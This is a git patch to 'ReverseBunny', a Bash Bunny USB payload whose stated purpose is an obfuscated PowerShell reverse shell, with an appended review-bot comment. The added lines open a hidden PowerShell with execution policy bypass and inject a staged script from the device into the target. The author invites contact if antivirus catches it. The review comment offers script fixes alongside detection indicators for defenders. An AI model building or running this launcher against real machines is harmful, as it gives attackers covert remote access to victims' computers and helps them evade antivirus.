From a74596db962e4ff2514b3145bfd16f125fd61d26 Mon Sep 17 00:00:00 2001
From: 0iphor13 <79219148+0iphor13@users.noreply.github.com>
Date: Fri, 1 Oct 2021 11:54:47 +0200
Subject: [PATCH] Update payload.txt
Added new "Eject Method" - props to Night(9o3)
---
 .../remote_access/ReverseBunny/payload.txt | 51 ++++++++++++++-----
 1 file changed, 38 insertions(+), 13 deletions(-)
diff --git a/payloads/library/remote_access/ReverseBunny/payload.txt b/payloads/library/remote_access/ReverseBunny/payload.txt
index 7f45b871..945fac51 100644
--- a/payloads/library/remote_access/ReverseBunny/payload.txt
+++ b/payloads/library/remote_access/ReverseBunny/payload.txt
@@ -1,30 +1,55 @@
+#!/bin/bash
+#
 # Title: ReverseBunny
-# Description: Obfuscated reverse shell, executed via powershell
+# Description: Get remote access using obfuscated powershell code - If caught by AV, feel free to contact me.
 # Author: 0iphor13
-# Version: 1.0
-# Category: Execution
+# Version: 1.1
+# Category: Remote_Access
 # Attackmodes: HID, Storage
+LED SETUP
+
 GET SWITCH_POSITION
-ATTACKMODE HID STORAGE
 DUCKY_LANG de
-#LED RED - DON'T EJECT - PAYLOAD RUNNING
+rm /root/udisk/DONE
-LED R FAST
+ATTACKMODE HID STORAGE
+
+#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
+
+LED STAGE1
 DELAY 5000
-RUN WIN "powershell -NoP -W hidden -NonI -Exec Bypass"
-DELAY 2000
+RUN WIN "powershell -NoP -NonI -W hidden -Exec Bypass"
+DELAY 6000
-Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\ReverseBunny.txt'))"
-DELAY 5000
+Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\RevBunny.txt'))"
+DELAY 10000
 Q ENTER
-DELAY 5000
+DELAY 10000
 Q CONTROL v
-DELAY 5000
+DELAY 10000
 Q ENTER
+DELAY 1000
+
+LED STAGE2
+
+until [ -f /root/udisk/DONE ]
+ do
+ sleep 0.2
+done
+
+LED CLEANUP
+
+rm /root/udisk/DONE
+
+DELAY 100
+
+sync
+
+DELAY 100
 LED FINISH
-#SAVE TO EJECT
\ No newline at end of file
+#SAVE TO EJECT
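Review bot: The added `until [ -f /root/udisk/DONE ]` loop near the end of the hunk has no timeout, and nothing in the header comments says what creates `DONE`, so a run where the marker never appears stays at `LED STAGE2` and never reaches `sync`. A one-line header comment such as `# Waits for /root/udisk/DONE (presumably written by the staged RevBunny.txt - confirm) before cleanup` would document the handshake. The early `rm /root/udisk/DONE` prints an error when the file is absent, which `rm -f /root/udisk/DONE` avoids. For anyone maintaining detections, this commit reorders the launcher flags to `-NoP -NonI -W hidden -Exec Bypass`, so rules should match the individual flags rather than an exact argument order. The `Set-Clipboard` call that reads from a volume labelled `BashBunny` via `gwmi win32_volume` is a further indicator that the reorder leaves unchanged.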